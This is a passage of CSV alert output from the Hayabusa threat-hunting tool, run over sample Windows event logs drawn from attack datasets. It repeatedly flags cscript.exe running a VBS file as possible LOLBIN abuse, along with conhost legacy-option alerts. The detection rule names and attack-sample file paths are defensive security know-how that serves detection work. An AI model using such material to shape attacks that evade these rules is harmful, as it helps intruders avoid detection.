Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:00:03.482 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:00:03.482 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:01:03.003 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:01:03.003 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:01:03.003 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:01:03.003 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:01:03.018 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:01:03.018 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:02:03.009 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:02:03.009 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:02:03.009 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:02:03.009 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:02:03.030 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:02:03.030 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:03:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:03:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:03:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:03:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:03:03.025 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:03:03.025 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:04:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:04:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:04:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:04:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:04:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:04:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:05:03.001 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:05:03.001 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:05:03.001 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:05:03.001 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:05:03.018 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:05:03.018 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:06:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:06:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:06:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:06:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:06:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:06:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:07:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:07:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:07:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:07:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:07:03.020 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:07:03.020 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:08:03.001 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:08:03.001 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:08:03.001 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:08:03.001 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:08:03.018 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:08:03.018 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:09:03.005 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:09:03.005 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:09:03.005 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:09:03.005 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:09:03.019 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:09:03.019 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:10:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:10:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:10:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:10:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:10:03.037 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:10:03.037 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:11:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:11:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:11:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:11:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:11:03.032 